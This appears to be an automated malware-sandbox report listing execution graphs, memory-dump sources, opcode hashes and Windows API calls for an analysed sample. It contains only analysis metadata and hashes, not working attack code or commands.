                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                        • API String ID: 0-1110479544
                        • Opcode ID: adf9c15a63d019b728be93b5b5aa4fc1331daa2c6d4b1b1575c6abcb0a8781ea
                        • Instruction ID: d4febd0286ddcbb14f5d26620539eb596d1c48a39c50f007e180d7f8db6ae393
                        • Opcode Fuzzy Hash: adf9c15a63d019b728be93b5b5aa4fc1331daa2c6d4b1b1575c6abcb0a8781ea
                        • Instruction Fuzzy Hash: 88B1C070B042059FCB55EB69C9549BEBBB7FF89200B5480AAE516DB391CF34DC81CB91

                        Execution Graph

                        Execution Coverage:6.8%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:49
                        Total number of Limit Nodes:4
                        execution_graph 16316 10350b0 16317 10350c8 16316->16317 16327 1034ca0 16317->16327 16319 10350cf 16320 10359a6 16319->16320 16321 103594a 16319->16321 16326 1035295 16319->16326 16335 1034d08 16320->16335 16331 1034ce8 16321->16331 16324 1035965 16325 1035a1d 16328 1034cab 16327->16328 16329 1034ce8 2 API calls 16328->16329 16330 1035965 16329->16330 16330->16319 16332 1034cf3 16331->16332 16333 1034d08 2 API calls 16332->16333 16334 1035a1d 16333->16334 16334->16324 16336 1034d13 16335->16336 16339 1034d38 16336->16339 16338 1035afa 16338->16325 16340 1034d43 16339->16340 16343 1034d68 16340->16343 16342 1035bfc 16342->16338 16344 1034d73 16343->16344 16345 103899b 16344->16345 16347 103b240 16344->16347 16345->16342 16351 103b268 16347->16351 16355 103b278 16347->16355 16348 103b256 16348->16345 16352 103b278 16351->16352 16358 103b360 16352->16358 16353 103b287 16353->16348 16357 103b360 2 API calls 16355->16357 16356 103b287 16356->16348 16357->16356 16359 103b381 16358->16359 16360 103b3a4 16358->16360 16359->16360 16366 103b5f8 16359->16366 16370 103b608 16359->16370 16360->16353 16361 103b39c 16361->16360 16362 103b5a8 GetModuleHandleW 16361->16362 16363 103b5d5 16362->16363 16363->16353 16367 103b61c 16366->16367 16368 103b641 16367->16368 16374 103adf8 16367->16374 16368->16361 16371 103b61c 16370->16371 16372 103adf8 LoadLibraryExW 16371->16372 16373 103b641 16371->16373 16372->16373 16373->16361 16375 103b7c8 LoadLibraryExW 16374->16375 16377 103b841 16375->16377 16377->16368

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 796 103b360-103b37f 797 103b381-103b38e call 1039d78 796->797 798 103b3ab-103b3af 796->798 803 103b390 797->803 804 103b3a4 797->804 799 103b3c3-103b404 798->799 800 103b3b1-103b3bb 798->800 807 103b411-103b41f 799->807 808 103b406-103b40e 799->808 800->799 853 103b396 call 103b5f8 803->853 854 103b396 call 103b608 803->854 804->798 810 103b443-103b445 807->810 811 103b421-103b426 807->811 808->807 809 103b39c-103b39e 809->804 814 103b4e0-103b55d 809->814 815 103b448-103b44f 810->815 812 103b431 811->812 813 103b428-103b42f call 103ad9c 811->813 817 103b433-103b441 812->817 813->817 846 103b563-103b5a0 814->846 847 103b55f 814->847 818 103b451-103b459 815->818 819 103b45c-103b463 815->819 817->815 818->819 821 103b470-103b479 call 103adac 819->821 822 103b465-103b46d 819->822 827 103b486-103b48b 821->827 828 103b47b-103b483 821->828 822->821 830 103b4a9-103b4b6 827->830 831 103b48d-103b494 827->831 828->827 837 103b4d9-103b4df 830->837 838 103b4b8-103b4d6 830->838 831->830 832 103b496-103b4a6 call 103adbc call 103adcc 831->832 832->830 838->837 848 103b5a2-103b5a5 846->848 849 103b5a8-103b5d3 GetModuleHandleW 846->849 847->846 848->849 850 103b5d5-103b5db 849->850 851 103b5dc-103b5f0 849->851 850->851 853->809 854->809
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0103B5C6
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237849625.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_1030000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c8a5aea46e64faadcd869e3f93aabcec74a4d44a504dd32feb1227e9392b2883
                        • Instruction ID: 503be9518a5e2a1adbbe3e06f2b6bfb9439092bb355388c04ef97ce4ebe9c710
                        • Opcode Fuzzy Hash: c8a5aea46e64faadcd869e3f93aabcec74a4d44a504dd32feb1227e9392b2883
                        • Instruction Fuzzy Hash: E28165B0A00B058FDB64DF2AD54579ABBF9FF88304F00896ED48AD7A41DB34E945CB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 855 103adf8-103b808 857 103b810-103b83f LoadLibraryExW 855->857 858 103b80a-103b80d 855->858 859 103b841-103b847 857->859 860 103b848-103b865 857->860 858->857 859->860
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0103B641,00000800,00000000,00000000), ref: 0103B832
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237849625.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_1030000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: b1b03b68f2d75f7e6d49db7a3657cf53a7e41f026381539ad490452015454c7b
                        • Instruction ID: 3b04cf9e086693bd5393ca7a3ea1e1667c47dcac7444cf7252ac0270fb338ad3
                        • Opcode Fuzzy Hash: b1b03b68f2d75f7e6d49db7a3657cf53a7e41f026381539ad490452015454c7b
                        • Instruction Fuzzy Hash: 6E1114B6C002098FDB10CF9AC844A9EFBF8EB88314F14842ED959A7200C375A945CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 864 103b7c0-103b808 866 103b810-103b83f LoadLibraryExW 864->866 867 103b80a-103b80d 864->867 868 103b841-103b847 866->868 869 103b848-103b865 866->869 867->866 868->869
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0103B641,00000800,00000000,00000000), ref: 0103B832
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237849625.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_1030000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 2cdf2bdd15eeb9cdb3c116351d0a8bdb3c0435ef31483e100e521bff87ebe444
                        • Instruction ID: b5e39815bb2d9cf22b0825514b93bd1fba05d5f9c4b323fc11f065f6b56da29c
                        • Opcode Fuzzy Hash: 2cdf2bdd15eeb9cdb3c116351d0a8bdb3c0435ef31483e100e521bff87ebe444
                        • Instruction Fuzzy Hash: 8211F6B6C002499FDB14CF9AD944ADEFBF8EB88314F14842ED569A7200C379A546CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 873 103b560-103b5a0 875 103b5a2-103b5a5 873->875 876 103b5a8-103b5d3 GetModuleHandleW 873->876 875->876 877 103b5d5-103b5db 876->877 878 103b5dc-103b5f0 876->878 877->878
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0103B5C6
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237849625.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_1030000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 9ae427791e1bff171fcab8529fd1393e2d8643e5b725c44d24b9dfd799ee2aae
                        • Instruction ID: dd26f8552196a27d456ff86cd378fdafa6822d336a31371e966343fb49507741
                        • Opcode Fuzzy Hash: 9ae427791e1bff171fcab8529fd1393e2d8643e5b725c44d24b9dfd799ee2aae
                        • Instruction Fuzzy Hash: 25110FB6C002498FDB10CF9AD844B9EFBF8EB88324F10845AD568B7240C379A545CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1193 fcd06c-fcd07e 1194 fcd118-fcd11f 1193->1194 1195 fcd084 1193->1195 1196 fcd086-fcd092 1194->1196 1195->1196 1197 fcd098-fcd0ba 1196->1197 1198 fcd124-fcd129 1196->1198 1200 fcd0bc-fcd0e0 1197->1200 1201 fcd12e-fcd143 1197->1201 1198->1197 1204 fcd0e8-fcd0f8 1200->1204 1205 fcd0fa-fcd102 1201->1205 1204->1205 1206 fcd150 1204->1206 1207 fcd104-fcd115 1205->1207 1208 fcd145-fcd14e 1205->1208 1208->1207
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237388380.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fcd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc34cc869c6c83b152fae3d74cf7783f280e883751aeef7c4f682261a06a087b
                        • Instruction ID: e1fcacb555d69564a0c6c86a65e2206258b2b815dd0632d3c64af49c0cec734f
                        • Opcode Fuzzy Hash: dc34cc869c6c83b152fae3d74cf7783f280e883751aeef7c4f682261a06a087b
                        • Instruction Fuzzy Hash: 26213872504201DFDB05DF14CAC1F1ABF65FB88324F24856CE9090B25AC33AD816DBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1210 fdd01c-fdd02e 1211 fdd0bd-fdd0c4 1210->1211 1212 fdd034 1210->1212 1213 fdd036-fdd042 1211->1213 1212->1213 1215 fdd0c9-fdd0ce 1213->1215 1216 fdd048-fdd06a 1213->1216 1215->1216 1217 fdd06c-fdd086 1216->1217 1218 fdd0d3-fdd0e8 1216->1218 1220 fdd08e-fdd09d 1217->1220 1222 fdd09f-fdd0a7 1218->1222 1220->1222 1223 fdd0f5 1220->1223 1224 fdd0a9-fdd0ba 1222->1224 1225 fdd0ea-fdd0f3 1222->1225 1225->1224
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237506685.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fdd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62679354c20699c90baf08f0b716c1eff7cde7eb24e9a5c1939d36d729533e22
                        • Instruction ID: a68bf609fb7838219716bbfef791e777003d1984e2bb7a90b9ac026481b66b9a
                        • Opcode Fuzzy Hash: 62679354c20699c90baf08f0b716c1eff7cde7eb24e9a5c1939d36d729533e22
                        • Instruction Fuzzy Hash: 3821F575504200DFCB15DF14D988B16BB66EBC8324F28C56ED80A4B34AC33BD807DA61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1227 fdd2c8-fdd2da 1228 fdd369-fdd370 1227->1228 1229 fdd2e0 1227->1229 1230 fdd2e2-fdd2ee 1228->1230 1229->1230 1232 fdd375-fdd37a 1230->1232 1233 fdd2f4-fdd316 1230->1233 1232->1233 1234 fdd37f-fdd394 1233->1234 1235 fdd318-fdd332 1233->1235 1239 fdd34b-fdd353 1234->1239 1237 fdd33a-fdd349 1235->1237 1237->1239 1240 fdd3a1 1237->1240 1241 fdd355-fdd366 1239->1241 1242 fdd396-fdd39f 1239->1242 1242->1241
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237506685.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fdd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d1fcbe1ee64b6c18dec54d395d979d786df5013b0b811925b25a543d7cbd770
                        • Instruction ID: c01cc6b6defb85547850e63b46d1dc79798ee758d667a8483e3c3ceb427a8eda
                        • Opcode Fuzzy Hash: 6d1fcbe1ee64b6c18dec54d395d979d786df5013b0b811925b25a543d7cbd770
                        • Instruction Fuzzy Hash: 66212971604304EFDB05DF14D5C4B16BBA6FB84324F28C96ED8094B356C33AD806DA62
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237506685.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fdd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97004345f20d8696bd2e4658834f7145fd3d469902f50e4442c1f086f9601c89
                        • Instruction ID: c64ae5a54ad1dd098a1ad55de7e44ddbec0e3239678c03f3cbfc60d09e33186c
                        • Opcode Fuzzy Hash: 97004345f20d8696bd2e4658834f7145fd3d469902f50e4442c1f086f9601c89
                        • Instruction Fuzzy Hash: 5D2183755093808FC712CF24D594715BF71EB46314F28C5EBD8498B6A7C33A980ACB62
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e4fadbec704d273437bf3cbd5d846fb80a73ebfe05af0f0ef262e72d78b9fc5
                        • Instruction ID: d46834f2d814709c568240ebc205b1eee54b7cf592e1da17e452829c29237bc5
                        • Opcode Fuzzy Hash: 3e4fadbec704d273437bf3cbd5d846fb80a73ebfe05af0f0ef262e72d78b9fc5
                        • Instruction Fuzzy Hash: 3D11A17760CA05CFEF48B63CD56157AB7A6EBC5602B14C86FD4878B385CD2288038761
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237388380.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fcd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                        • Instruction ID: bf2742a5e21fa966318df464c13188fc1c57c585d6e34e301f97d5e73b7f1e20
                        • Opcode Fuzzy Hash: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                        • Instruction Fuzzy Hash: 6C21D576404244DFDB06CF00DAC4B1ABF72FB88324F28C2ADD9490B256C33AD416DB91
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237506685.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fdd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                        • Instruction ID: 81f8fa0a03dd3052c9e265683bf551ef7cfb751b1dde8e6ec591b64b575f8875
                        • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                        • Instruction Fuzzy Hash: AE119D75904280DFDB06CF24D5C4B15BBA2FB84324F28C6AED8494B756C33AD85ADB62
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 111a8b7c45f9db18301f9e01c5df88883ba7d5dd8ac6d5ab661ae62e26f78437
                        • Instruction ID: e23f691fa75951515d05c416508ba91936c3cf4e2b2e2a7692d10fa66a8d6f77
                        • Opcode Fuzzy Hash: 111a8b7c45f9db18301f9e01c5df88883ba7d5dd8ac6d5ab661ae62e26f78437
                        • Instruction Fuzzy Hash: 5501D43371C908DBAE44B63DD46053AB7AAEBC5A42B14885FD8978B344CD638C028B91
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237388380.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fcd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d75f7bc0ab0e5c9e32fdf30a750abae84c0c7257c14bcfd648ef5023bac9f12b
                        • Instruction ID: aff50b221c6198b5c487eb9f4f295fe161a274c92492263cec7d41ad792068d3
                        • Opcode Fuzzy Hash: d75f7bc0ab0e5c9e32fdf30a750abae84c0c7257c14bcfd648ef5023bac9f12b
                        • Instruction Fuzzy Hash: 1601A7728083459AE7118A15CA85F6ABF98EF95330F18C42DED095A1C6C6799840E6B1
                        Memory Dump Source
                        • Source File: 00000011.00000002.2237388380.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_fcd000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d01ea2e28dfda7744c9f6c28c7ea1a79d2312b664c275f0d8ba51fbc94c9f286
                        • Instruction ID: ec318282b821765485d3ba66ebd4eef40209825be93720c1132b53ce2a642e5f
                        • Opcode Fuzzy Hash: d01ea2e28dfda7744c9f6c28c7ea1a79d2312b664c275f0d8ba51fbc94c9f286
                        • Instruction Fuzzy Hash: F7F062728043449AE7108A15CAC5B66FF98EB91734F18C45EED485A286C3799844DAB1
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cbd16f9a9eaeee1123603c4bdaf67e122789beb852bc61bfb61e5f5bb60c9a3
                        • Instruction ID: 5e18fcc2540a82d31ed810b908dafb8648e3e80924bfbcd4c27ebc90c66c8aed
                        • Opcode Fuzzy Hash: 9cbd16f9a9eaeee1123603c4bdaf67e122789beb852bc61bfb61e5f5bb60c9a3
                        • Instruction Fuzzy Hash: B1E08CAE704A205FEB56253CB8521EE77AADAC2A12345803FE186E7341ED290C0383B1
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 91027137bb058ceb5abc506b616c16d96f5d47f561c725d949dacf91108ebc74
                        • Instruction ID: c63d4c2ed85765c298fe2804e99739e5643330927241765dcfda562e69655a08
                        • Opcode Fuzzy Hash: 91027137bb058ceb5abc506b616c16d96f5d47f561c725d949dacf91108ebc74
                        • Instruction Fuzzy Hash: C8E0269360C5509FEF12667CA870030BBA0DDE655734848DFD086CA1A2DD42D603C310
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 08a1151e1e384b41e70bfeebf4ea2f41ef9f2d10b7cbb1efb363d93c8623075b
                        • Instruction ID: 6e404a08385e94c4ca35a1ad6eb60d1d2c4b4113e540e55d1a5e0936aaf5e0b3
                        • Opcode Fuzzy Hash: 08a1151e1e384b41e70bfeebf4ea2f41ef9f2d10b7cbb1efb363d93c8623075b
                        • Instruction Fuzzy Hash: DDE08660C4034AAADB605B7C8D456CE7F74D700625F50C5A9D091A7581DF384187CB51
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1395fe5eb6894bf9b6136ed65bf7fcc5b7e6bc758cf449be6ffa46cf070b67b4
                        • Instruction ID: fb16f569b375fd6c66972bab2dfcced9d8cd691cad85dbc8cf3d698426e2b364
                        • Opcode Fuzzy Hash: 1395fe5eb6894bf9b6136ed65bf7fcc5b7e6bc758cf449be6ffa46cf070b67b4
                        • Instruction Fuzzy Hash: 73D0A92B704928132A5A317EB8104AEB28FCAC2A23344003FA28987340EE6A4C0203E6
                        Memory Dump Source
                        • Source File: 00000011.00000002.2247556795.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_8f90000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7dd57b6d0b77249c2bad76362202b4cd543468d4ecba9535e33fd343ee6cc73c
                        • Instruction ID: 361844db45afdfa836d40cb5bcee873e303b033b76edf50d6b6387c8c133c6c3
                        • Opcode Fuzzy Hash: 7dd57b6d0b77249c2bad76362202b4cd543468d4ecba9535e33fd343ee6cc73c
                        • Instruction Fuzzy Hash: 74D067B0D4430EEEDF90EFBD890579EBBF4BB44200F50896AC055E7241EBB482548F91
                        Strings
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_eq$(_eq$,iq$4ceq$4ceq$Hiq$Nvdq$$eq$$eq$$eq$ceq$ceq
                        • API String ID: 0-3530788617
                        • Opcode ID: cace4d50bb55586fcf30165b58c1cb7a7d708421ba0e816c0665a9af2b0fce6a
                        • Instruction ID: 67e833e5fd242777e547d82de3d27ccc64dcd6415774ce1b618428fddc27b284
                        • Opcode Fuzzy Hash: cace4d50bb55586fcf30165b58c1cb7a7d708421ba0e816c0665a9af2b0fce6a
                        • Instruction Fuzzy Hash: 108267B1B101188FCB95EBBD441126E7AE3FFCD750B6149AAD60ADB385EE34CC414BA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'eq$4ceq$4ceq$4ceq$4|jq$$eq$$eq$$eq$$eq$$eq
                        • API String ID: 0-2670270986
                        • Opcode ID: 975d688e0983ea054f2c315ea27991b63df88e96c2f5a7f27404a98a10bb08b3
                        • Instruction ID: c9f8b0759a0472ef914a20036206994fb045fb5523f35851b0d426dbc08cdf02
                        • Opcode Fuzzy Hash: 975d688e0983ea054f2c315ea27991b63df88e96c2f5a7f27404a98a10bb08b3
                        • Instruction Fuzzy Hash: 51427D70B102199FDB54DF7AC854AAEBBF6BF88300F148069E605DB3A5EB349D41CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID: Hiq$Hiq$Hiq$Hiq$Hiq
                        • API String ID: 0-1376665358
                        • Opcode ID: 5be65ffa90fc52071abc74e424d57e355ee75832378f9e02ca0744e76c799cae
                        • Instruction ID: b26dba0433c2187f3a19a81d0e4494b91e7a9c133f3da650299a286eaa7405c5
                        • Opcode Fuzzy Hash: 5be65ffa90fc52071abc74e424d57e355ee75832378f9e02ca0744e76c799cae
                        • Instruction Fuzzy Hash: 4602BE31E24256CFCB55CF79C4502ADFBF2EF85300F24866AD546EB241EB34AA85CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID: Hiq
                        • API String ID: 0-3823623015
                        • Opcode ID: f2eb8f40f29b8c17b76124bed68a04067fa8369e0828e27fc0ee6712319eadeb
                        • Instruction ID: a9dc368a86816b9f2427bdfbaa20ab2d20e76c1307306dbaa04233949b628c0e
                        • Opcode Fuzzy Hash: f2eb8f40f29b8c17b76124bed68a04067fa8369e0828e27fc0ee6712319eadeb
                        • Instruction Fuzzy Hash: D4F10570A2426A8FCB55CF75C4501ADFBF2AF86300F14C566E789EB241EB74DA85CB90
                        Memory Dump Source
                        • Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f276f5aa498895385367d527cb5bffdf53839d8afbecdc04f5b20061f8bf27a8
                        • Instruction ID: 76ce0206fd2775c2349e341cef6e1e5ed51bb2c4f29dad9c13751356f3a332e0
                        • Opcode Fuzzy Hash: f276f5aa498895385367d527cb5bffdf53839d8afbecdc04f5b20061f8bf27a8
                        • Instruction Fuzzy Hash: 1482EA74B006148FCB55DF68D899B6DBBB2EF88300F5084A9E94A9B3A5DF349D81CF50
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00e987410f578a8756ace7ef0bd818048cc4c4d52c8917f610478c058e584da7
                        • Instruction ID: 01ff16b45888fcac6b1a6c93e2290b005b8f65d9f270fdc9fe300b319d4c3e97
                        • Opcode Fuzzy Hash: 00e987410f578a8756ace7ef0bd818048cc4c4d52c8917f610478c058e584da7
                        • Instruction Fuzzy Hash: D6829134A201168FEBA5EF24D954B6E77F2EF85304F3081A5CA099B366EB709C45CF61
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a15fd350bfe1ce9a8b752b6cab86973664e44819c39ac700061517f45e334c6
                        • Instruction ID: 3dc52e2899879f2a97a33d1320cfb91a39ab088dc90d31950e524ee4c207e4db
                        • Opcode Fuzzy Hash: 0a15fd350bfe1ce9a8b752b6cab86973664e44819c39ac700061517f45e334c6
                        • Instruction Fuzzy Hash: 53F14278E102089FDB48DFB8D895ABEB7B6FF88300F509419E505AB395DB34AC51DB24
                        Strings
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID: (iq$Hiq$Hiq$Hiq
                        • API String ID: 0-4174723736
                        • Opcode ID: 289ac746256669ee18fbe8bcfe0d4dd821b43ea50da0a6db3ed397faf0a97ff9
                        • Instruction ID: a2254a9aa1b2df348d01a84071ad54930c896fa6715d62df6d0e7720aa6814e5
                        • Opcode Fuzzy Hash: 289ac746256669ee18fbe8bcfe0d4dd821b43ea50da0a6db3ed397faf0a97ff9
                        • Instruction Fuzzy Hash: A891DC30B142449FCB55EF39D85556E7BB6FF89200B1488AAE586CB381EF30EE05CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd
                        Similarity
                        • API ID:
                        • String ID: (iq$(iq
                        • API String ID: 0-2590639791
                        • Opcode ID: 9f54c45c9999e1bb33514fb6dc9a84c9fdede389b5d729885093b6f7ee33600d
                        • Instruction ID: 88250fb16f3eb1b74941fd41e095773200d0d60ec2baf283198530c007d29f36
                        • Opcode Fuzzy Hash: 9f54c45c9999e1bb33514fb6dc9a84c9fdede389b5d729885093b6f7ee33600d
